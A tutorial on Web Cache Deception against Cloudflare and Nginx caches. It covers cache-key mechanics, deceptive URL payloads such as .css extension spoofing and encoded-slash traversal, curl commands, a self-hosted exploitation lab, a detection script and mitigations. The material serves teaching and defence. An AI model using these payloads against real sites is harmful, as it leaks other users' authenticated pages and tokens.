Introduction
Web Cache Deception (WCD) is an attack technique that tricks a caching layer, often a CDN or reverse proxy, into storing and serving sensitive resources (HTML pages, JSON API responses, or credentials) as if they were public static assets. The attacker crafts a URL that the origin treats as a private page but the cache treats as a static file, then lures an authenticated victim into requesting it; the cache stores the victim's response and serves it to anyone who later requests the same deceptive URL.
Why it matters: A successful WCD sidesteps authentication by handing one user's authenticated response to other clients, and it can leak internal configuration or private API responses. Because CDNs such as Cloudflare sit at the edge of the network, the impact can be global, turning a single misconfiguration into a mass data leak.
Real-world relevance: Security researchers have demonstrated WCD against major platforms, and bug bounty programs now list it as a high-severity issue. Understanding how the cache key is built, how normalization works, and how extensions are interpreted is essential for any web-security professional.
Prerequisites
- Solid grasp of HTTP caching fundamentals (Cache-Control, ETag, Vary, etc.).
- Familiarity with Nginx configuration syntax and basic server administration on Linux.
- Access to a Cloudflare-protected domain (free tier works) and the ability to modify DNS records.
- Command-line tools: curl, wget, dig, and a modern browser with dev tools.
Core Concepts
Before diving into the lab, review the three pillars of cache deception:
- Cache key construction - The combination of scheme, host, path, query string, and selected request headers that uniquely identifies a cached entry.
- Normalization & extension handling - How the caching layer rewrites or sanitizes URLs (removing duplicate slashes, decoding %20, stripping extensions).
- Response classification - Whether the backend marks a response as cacheable (Cache-Control: public) or private, and whether the CDN respects that classification.
Diagram (described):
- Client → (HTTPS) → Cloudflare Edge Node → (HTTP) → Nginx Origin.
- Cloudflare builds a cache key, by default roughly scheme://host + path + query string; a custom cache key can add or drop components.
- If a later request maps to the same key as an earlier request that returned a private page, the cached private response is served to the new requester.
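The key construction described above can be sketched in a few lines of Python. This is a simplified model, not Cloudflare's or Nginx's actual implementation: the function name `cache_key` and the `include_query` switch are illustrative assumptions, and real caches may add headers, ports, or other components.

```python
from urllib.parse import urlsplit


def cache_key(url, include_query=True):
    """Build a simplified cache key: scheme://host + path (+ ?query).

    Assumption: the port and all request headers are left out of the key.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()  # host names are case-insensitive
    key = f"{parts.scheme.lower()}://{host}{parts.path or '/'}"
    if include_query and parts.query:
        key += "?" + parts.query
    return key


if __name__ == "__main__":
    print(cache_key("https://Example.com/dashboard.css?v=1"))
    print(cache_key("https://example.com/dashboard.css?v=1", include_query=False))
```

Two requests share a cache entry only when this function returns the same string for both, which is why /dashboard and /dashboard.css are separate entries even if the origin answers them identically.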
Cache key construction and normalization
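Both Nginx and Cloudflare construct the cache key from the request line and the Host header, but they differ in how they treat certain characters:
- Path normalization: duplicate slashes (//), dot-segments (/./, /../), and percent-encoded characters may be collapsed or decoded, and the cache and the origin do not always agree on the result.
- Extension-based caching: Many CDNs treat .css, .js, .png and similar extensions as static and decide cacheability from the extension at the end of the path rather than from the response's Content-Type. Cloudflare's default behavior works this way.
- Query string handling: By default Cloudflare includes the full query string in the key, but a custom cache key can be configured to ignore it.
- Vary header influence: Caches that honor Vary add the listed request header values to the key as a secondary key. Cloudflare honors Vary: Accept-Encoding (and Vary for images when that feature is enabled) but otherwise ignores the header, so Vary: Cookie does not partition its cache.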
Example Nginx cache-key snippet:
proxy_cache_key "$scheme://$host$request_uri";
Note that $request_uri holds the original request URI exactly as the client sent it, including the query string; it is not normalized. The normalized, decoded path is available in $uri.
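To make the normalization gap concrete, here is a minimal Python sketch of two components that normalize the same path differently. The function `normalize_path` and its `decode_first` flag are hypothetical; which side (cache or origin) decodes before resolving dot-segments varies between products and is an assumption here.

```python
import re
from urllib.parse import unquote


def normalize_path(path, decode_first):
    """Collapse duplicate slashes and resolve dot-segments.

    decode_first=True models a component that percent-decodes before
    resolving dot-segments; False models one that leaves encoding alone.
    """
    if decode_first:
        path = unquote(path)
    path = re.sub(r"/{2,}", "/", path)  # "//" -> "/"
    resolved = []
    for segment in path.split("/")[1:]:
        if segment == ".":
            continue
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


if __name__ == "__main__":
    raw = "/static/..%2Fprivate//secret"
    print(normalize_path(raw, decode_first=False))
    print(normalize_path(raw, decode_first=True))
```

If the cache sees the first result (a path under /static/) while the origin sees the second (/private/secret), the cache may apply its static-asset rules to a private response.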
Path-confusion and extension spoofing
Path-confusion attacks rely on two behaviors: many caches treat the extension at the end of the path as a sign that the response is a cacheable static file, regardless of the actual response body, and many origins ignore an unexpected suffix and still route the request to the private handler. By appending a harmless static extension to a private URL, the attacker convinces the cache that the response is static.
Typical payloads:
- /admin/config.json → /admin/config.json.css
- /api/secret?token=abc → /api/secret.css?token=abc (the extension must end the path, not the query string)
- /private/data → /private/data/.well-known/..%2F..%2F..%2F/private/data (encoded-slash traversal; %2F is a single-encoded slash, double encoding would be %252F)
When the origin returns Content-Type: application/json but the URL path ends with .css, a cache that decides by extension may still store the response under that URL's key. Subsequent requests for /admin/config.json.css then receive the JSON payload.
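When testing many endpoints, the candidate URLs can be generated rather than typed by hand. The sketch below is one possible helper, not a standard tool: `deceptive_variants`, the extension list, and the extra `/x<ext>` path-segment variant are assumptions chosen for illustration. Only the path is modified; the query string is carried over unchanged.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumed list of extensions the cache treats as static.
STATIC_EXTENSIONS = (".css", ".js", ".png")


def deceptive_variants(url):
    """Return candidate WCD URLs for a private endpoint."""
    parts = urlsplit(url)
    base = parts.path.rstrip("/")
    paths = []
    for ext in STATIC_EXTENSIONS:
        paths.append(base + ext)        # /api/secret.css
        paths.append(f"{base}/x{ext}")  # /api/secret/x.css
    return [
        urlunsplit((parts.scheme, parts.netloc, p, parts.query, ""))
        for p in paths
    ]


if __name__ == "__main__":
    for candidate in deceptive_variants("https://example.com/api/secret?token=abc"):
        print(candidate)
```

Whether any candidate works depends on the origin still routing the modified path to the private handler, so each one has to be checked against the real response.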
Static resource impersonation
Many applications serve both static assets (images, CSS) and dynamic pages from the same host. If the caching layer cannot differentiate them correctly, a private HTML page can be cached as if it were a CSS file.
Example scenario:
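# The logged-in victim loads the dashboard normally: private, not cached
curl -I https://example.com/dashboard
# HTTP/1.1 200 OK
# Content-Type: text/html
# Cache-Control: private, max-age=0
# After the victim has been lured to /dashboard.css, the attacker requests it
curl -I https://example.com/dashboard.css
# HTTP/1.1 200 OK (served from cache)
# Content-Type: text/html
# X-Cache-Status: HIT
Because the victim's request path ends with .css, the CDN classifies it as static and stores the HTML response under the /dashboard.css key. Any user requesting /dashboard.css now receives the victim's private dashboard HTML; a text/html Content-Type on a .css URL is the giveaway.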
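The whole scenario can be simulated offline. The following Python sketch pairs a hypothetical lenient origin with a toy cache that decides purely by extension and ignores cookies; both `origin` and `ExtensionCache` are illustrative stand-ins, not models of any specific product.

```python
import posixpath

STATIC_EXTENSIONS = {".css", ".js", ".png"}


def origin(path, session=None):
    """Hypothetical lenient origin: anything starting with /dashboard
    renders the logged-in user's dashboard, whatever suffix follows."""
    if path.startswith("/dashboard"):
        if session:
            return f"<html>dashboard of {session}</html>"
        return "<html>login</html>"
    return "not found"


class ExtensionCache:
    """Toy cache: stores any response whose path has a static extension."""

    def __init__(self):
        self.store = {}

    def fetch(self, path, session=None):
        if path in self.store:
            return "HIT", self.store[path]
        body = origin(path, session)
        if posixpath.splitext(path)[1] in STATIC_EXTENSIONS:
            self.store[path] = body  # the cookie is not part of the key
        return "MISS", body


if __name__ == "__main__":
    cache = ExtensionCache()
    print(cache.fetch("/dashboard.css", session="alice"))  # victim is lured
    print(cache.fetch("/dashboard.css"))                   # attacker, no session
```

The second call returns Alice's dashboard to an unauthenticated client, while a plain /dashboard request is never stored because it has no static extension.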
Host header and Vary header abuse on CDNs
CDNs normally include the Host header in the cache key. Problems arise when the origin selects the tenant from something the key does not cover, such as a forwarded-host header, or when a custom cache key drops the host: the CDN can then serve data belonging to a different virtual host.
Similarly, a cache that ignores Vary on cookies or custom headers can serve one user's response to another. Example:
curl -H "Cookie: session=alice" https://example.com/profile.css
# Alice is lured to the deceptive URL; the origin returns her profile (private)
curl -H "Cookie: session=bob" https://example.com/profile.css
# The cache treats .css as static and ignores the Cookie header → Bob receives Alice's data
Mitigation: Mark every response that depends on authentication cookies as Cache-Control: private, no-store. Vary: Cookie helps only with caches that honor Vary; Cloudflare honors it only for Accept-Encoding (and for images when that feature is enabled), so do not rely on it there.
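The effect of Vary on the cache key can be shown with a small Python sketch. It assumes a simplified model in which a Vary-honoring cache appends the named request header values to the key; the function `vary_key` and its `honor_vary` flag are hypothetical.

```python
def vary_key(url, request_headers, vary, honor_vary=True):
    """Return the cache key, extended by the Vary-listed request headers
    when the cache honors Vary."""
    if not honor_vary or not vary:
        return (url,)
    names = sorted(h.strip().lower() for h in vary.split(",") if h.strip())
    lowered = {k.lower(): v for k, v in request_headers.items()}
    return (url,) + tuple((name, lowered.get(name, "")) for name in names)


if __name__ == "__main__":
    url = "https://example.com/profile.css"
    alice = {"Cookie": "session=alice"}
    bob = {"Cookie": "session=bob"}
    # Honoring Vary: Cookie gives each session its own entry.
    print(vary_key(url, alice, "Cookie") == vary_key(url, bob, "Cookie"))
    # Ignoring Vary: both sessions collapse onto one entry.
    print(vary_key(url, alice, "Cookie", honor_vary=False)
          == vary_key(url, bob, "Cookie", honor_vary=False))
```

With `honor_vary=False` the two sessions share a key, which is the condition under which Bob is served Alice's cached response.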
Bypassing cache rules with query parameters and cookies
Most CDNs include the full query string in the cache key, although many deployments deliberately strip it for static resources to improve the hit rate. Where the query string is part of the key, an attacker can append a harmless parameter that does not affect the backend logic yet gives the request a fresh cache key that no earlier response occupies.
Example bypass:
curl -I "https://example.com/secret.docx?cachebuster=123"
# The unique query string guarantees a fresh key (a MISS). Whether the response is then stored depends on whether the edge honors or overrides the origin's Cache-Control: private.
Conversely, if the CDN is configured to ignore query strings for .css files, every query-string variant maps to one key: a victim lured to the URL with any parameters populates the entry, and the attacker retrieves it by requesting the bare path.
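Both cases can be expressed as one key policy. The Python sketch below assumes a hypothetical edge rule that drops the query string only for .css and .js paths; `key_for` and `IGNORE_QUERY_FOR` are illustrative names, not Cloudflare settings.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed rule: the query string is ignored for these extensions only.
IGNORE_QUERY_FOR = {".css", ".js"}


def key_for(url):
    """Return the path-based cache key under the assumed rule."""
    parts = urlsplit(url)
    ext = posixpath.splitext(parts.path)[1].lower()
    if ext in IGNORE_QUERY_FOR or not parts.query:
        return parts.path
    return f"{parts.path}?{parts.query}"


if __name__ == "__main__":
    # A cache-buster yields a distinct key for each value.
    print(key_for("https://example.com/secret.docx?cachebuster=123"))
    print(key_for("https://example.com/secret.docx?cachebuster=124"))
    # For .css, every query variant collapses onto the bare path.
    print(key_for("https://example.com/profile.css?utm=mail"))
```

Under this rule a link carrying tracking parameters and the bare /profile.css path resolve to the same entry, so the attacker does not need to know which parameters the victim's request carried.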
Step-by-step lab: crafting deceptive URLs, configuring Nginx, testing against Cloudflare
This lab walks you through a complete WCD exploitation cycle.
- Set up a test domain (e.g., lab.example.com) and point it to a Cloudflare-proxied IP.
- Deploy a minimal Nginx origin that serves a private HTML page at /private/secret and a static CSS file at /static/style.css.
- Configure Nginx to send Cache-Control: private for the secret page and public for the CSS.
- Create deceptive URLs by appending .css to the secret path.
- Flush the Cloudflare cache (via API or dashboard) to ensure a clean start.
- Trigger the cache with curl and verify the X-Cache-Status header.
- Validate leakage by requesting the deceptive URL from a different client.
Full Nginx config:
server {
    listen 80;
    server_name lab.example.com;

    # Private endpoint - never cache.
    # Prefix match on purpose: /private/secret.css also lands here,
    # modeling an origin that ignores unexpected suffixes.
    location /private/secret {
        # Force text/html regardless of the extension in the URL.
        types { }
        default_type text/html;
        add_header Cache-Control "private, max-age=0";
        return 200 "<html><body>Sensitive data for Alice</body></html>";
    }

    # Public static asset
    location /static/ {
        root /usr/share/nginx/html;
        add_header Cache-Control "public, max-age=86400";
    }

    # Fallback - 404
    location / {
        return 404;
    }
}
Testing steps (bash):
# 1. Warm up the cache with the legitimate static file
curl -I https://lab.example.com/static/style.css
# 2. Request the secret page with a deceptive .css extension
curl -i https://lab.example.com/private/secret.css
# Expected: 200 OK, Content-Type: text/html, X-Cache-Status: MISS (first time)
# 3. Request the same URL from another client (no auth)
curl -i https://lab.example.com/private/secret.css
# Expected: 200 OK, X-Cache-Status: HIT - secret HTML is now publicly cached
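When using Cloudflare, you will see the CF-Cache-Status header instead of X-Cache-Status (a custom header that Nginx setups often populate from $upstream_cache_status). The same logic applies. Note that Cloudflare by default does not cache responses marked Cache-Control: private, so a HIT in step 3 means the edge has a rule that overrides the origin's headers for this URL, which is the misconfiguration the lab is meant to demonstrate.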
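The victim-then-attacker sequence from the testing steps can also be scripted. This is a minimal Python sketch using only the standard library; the function names `fetch` and `leaks` and the `victim_cookie` parameter are assumptions (the lab origin above does not check cookies, so any value works there). The `fetch` argument is injectable so the logic can be exercised without network access.

```python
import urllib.request


def fetch(url, cookie=None):
    """GET the URL and return (CF-Cache-Status value, body bytes)."""
    request = urllib.request.Request(url)
    if cookie:
        request.add_header("Cookie", cookie)
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.headers.get("CF-Cache-Status", ""), response.read()


def leaks(url, victim_cookie, fetch=fetch):
    """Send the victim's request, then an unauthenticated one.

    Returns True when the second response is a cache HIT carrying the
    same body the victim received.
    """
    _, victim_body = fetch(url, victim_cookie)
    status, attacker_body = fetch(url, None)
    return status.upper() == "HIT" and attacker_body == victim_body


if __name__ == "__main__":
    # Hypothetical lab URL; replace with your own test domain.
    print(leaks("https://lab.example.com/private/secret.css", "session=alice"))
```

Comparing bodies as well as the status header avoids flagging a HIT that merely serves a public error page.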
Detecting successful deception with curl/wget and browser dev tools
Key indicators:
- CF-Cache-Status: HIT (or X-Cache-Status: HIT) on a request that should be private.
- Mismatch between the URL extension and the Content-Type (e.g., a .css URL answered with text/html).
- Authentication cookies present in the request but Cookie not listed in the Vary header.
Example curl detection script:
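#!/usr/bin/env bash
# Usage: ./detect.sh <url>
# Run it twice: the first request may be a MISS that populates the cache.
URL="${1:?usage: $0 <url>}"
# Dump the response headers to stdout and discard the body.
RESPONSE=$(curl -s -D - "$URL" -o /dev/null)
if echo "$RESPONSE" | grep -iq "CF-Cache-Status: HIT"; then
    echo "[!] Cache HIT detected - possible deception!"
    echo "$RESPONSE" | grep -i "content-type"
else
    echo "[-] No cache hit - likely safe."
fi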
In Chrome dev tools, look at the Network tab, select the request, and inspect the Response Headers. Cloudflare adds CF-Cache-Status. A value of HIT combined with a private Cache-Control header is a red flag.
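The indicators above can be checked programmatically once the headers are captured. The Python sketch below is one possible heuristic, not an exhaustive detector: `red_flags` and the small `EXPECTED_TYPES` table are assumptions made for illustration, and the table would need extending for other extensions.

```python
import posixpath
from urllib.parse import urlsplit

# Substring expected in Content-Type for each extension (assumed, partial).
EXPECTED_TYPES = {".css": "text/css", ".js": "javascript", ".png": "image/png"}


def red_flags(url, headers):
    """Return a list of WCD warning signs for one response."""
    h = {k.lower(): v for k, v in headers.items()}
    flags = []

    statuses = (h.get("cf-cache-status", ""), h.get("x-cache-status", ""))
    hit = any(s.upper() == "HIT" for s in statuses)
    cache_control = h.get("cache-control", "").lower()
    if hit and ("private" in cache_control or "no-store" in cache_control):
        flags.append("cache HIT on a response marked private/no-store")

    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    expected = EXPECTED_TYPES.get(ext)
    content_type = h.get("content-type", "").lower()
    if expected and expected not in content_type:
        flags.append(f"{ext} URL answered with Content-Type {content_type or 'missing'}")
    return flags


if __name__ == "__main__":
    print(red_flags(
        "https://example.com/dashboard.css",
        {"CF-Cache-Status": "HIT", "Cache-Control": "private, max-age=0",
         "Content-Type": "text/html"},
    ))
```

An empty list does not prove the endpoint is safe; it only means neither heuristic fired for that particular response.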
Tools & Commands
- curl - fetch headers, manipulate Host, Cookie, and query strings.
- wget - similar to curl but useful for recursive fetches.
- dig - verify DNS points to Cloudflare.
- Cloudflare API - curl -X POST " ... to flush caches.
- Burp Suite / OWASP ZAP - intercept and replay requests with altered extensions.
- ngrep or tcpdump - observe raw HTTP traffic between client and edge.
Defense & Mitigation
- Strict Cache-Control: Use Cache-Control: private, no-store for any endpoint that depends on authentication, and make sure no edge rule overrides it.
- Vary on Authorization: Include Vary: Authorization, Cookie when responses differ per user, keeping in mind that not every CDN honors Vary.
- Validate extension against Content-Type at the edge: Enable Cloudflare's Cache Deception Armor, or use a Worker, so that responses whose Content-Type does not match the URL extension are not cached.
- Dedicated static host: Serve static assets from a dedicated sub-domain (e.g., static.example.com) that never returns private data.
- Cache-key hygiene: Strip potentially confusing query parameters before caching (Cloudflare custom cache key).
- Security testing: Include WCD checks in your CI pipeline using the detection script above.
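The first and third mitigations boil down to a single caching decision. The Python sketch below shows that decision as a pure function; it is an illustration of the logic, not Cloudflare's implementation, and `should_cache` and the `STATIC_TYPES` allow-list are hypothetical names. An edge Worker or reverse-proxy rule would apply the same checks in its own language.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed allow-list: extension -> acceptable media types.
STATIC_TYPES = {
    ".css": ("text/css",),
    ".js": ("application/javascript", "text/javascript"),
    ".png": ("image/png",),
}


def should_cache(url, response_headers):
    """Cache only static-looking URLs whose response agrees with the URL."""
    h = {k.lower(): v.lower() for k, v in response_headers.items()}

    # Honor the origin: never store private/no-store or cookie-setting responses.
    directives = {d.strip().split("=")[0] for d in h.get("cache-control", "").split(",")}
    if directives & {"private", "no-store"} or "set-cookie" in h:
        return False

    # Require a known static extension and a matching Content-Type.
    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    allowed = STATIC_TYPES.get(ext)
    if allowed is None:
        return False
    media_type = h.get("content-type", "").split(";")[0].strip()
    return media_type in allowed


if __name__ == "__main__":
    print(should_cache("https://example.com/private/secret.css",
                       {"Content-Type": "text/html", "Cache-Control": "public"}))
```

Failing closed (returning False for unknown extensions) trades some hit rate for safety, which is usually the right default on hosts that mix static and authenticated content.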
Common Mistakes
- Assuming Cache-Control: private alone prevents caching - an edge rule that overrides origin headers for static-looking URLs will cache the response anyway.
- Relying on file extensions to infer content type - attackers can append a benign extension to any path.
- Not adding Vary: Cookie when responses depend on session cookies and the cache in front honors Vary.
- Purging a single URL and assuming the leak is gone - every deceptive variant is a separate cache entry, so purge each one (Cloudflare's “Purge by URL”) or use “Purge Everything”.
- Testing only with a browser - browsers normalize URLs before sending them (for example, resolving dot-segments); use curl, with --path-as-is where needed, for raw behavior.
Real-World Impact
Enterprises that host mixed static/dynamic content on the same host are prime targets. A successful WCD can expose:
- Internal API keys returned in JSON payloads.
- User-specific dashboards leaking personal data.
- Configuration files (.env, config.yaml) if served via a misconfigured route.
Case study (hypothetical): A SaaS provider used Cloudflare to accelerate its UI. The /account/settings endpoint returned JSON with API tokens and was protected by a session cookie. By luring a logged-in user into requesting /account/settings.css, an attacker caused Cloudflare to cache the JSON as a CSS asset. Within minutes, the token was retrievable by anyone who requested the same URL, leading to a full account takeover.
My expert opinion: As CDNs add more aggressive edge-caching heuristics, the attack surface widens. Organizations must treat caching as a security layer, not just a performance optimization.
Practice Exercises
- Deploy the lab environment described above on a VPS and a free Cloudflare account. Verify that the secret page is not cached initially.
- Craft three deceptive URLs using different techniques (extension spoofing, double-encoding, query-string addition). Document which ones result in a cache HIT.
- Modify the Nginx configuration to add Vary: Cookie. Re-run the exercises and note the change in behavior.
- Write a small Cloudflare Worker that rejects any request where the URL extension does not match the Content-Type header. Deploy and test.
- Integrate the detection Bash script into a CI job that scans your production URLs daily and alerts on unexpected cache hits.
Summary
Web Cache Deception exploits the way CDNs and reverse proxies build cache keys. By manipulating URL paths, extensions, and headers, attackers can force private responses into public caches. This guide covered the underlying cache-key mechanics, common deception techniques, a hands-on lab with Nginx and Cloudflare, detection methods, and mitigation best practices. Mastering these concepts equips security professionals to audit, harden, and monitor modern edge-caching deployments.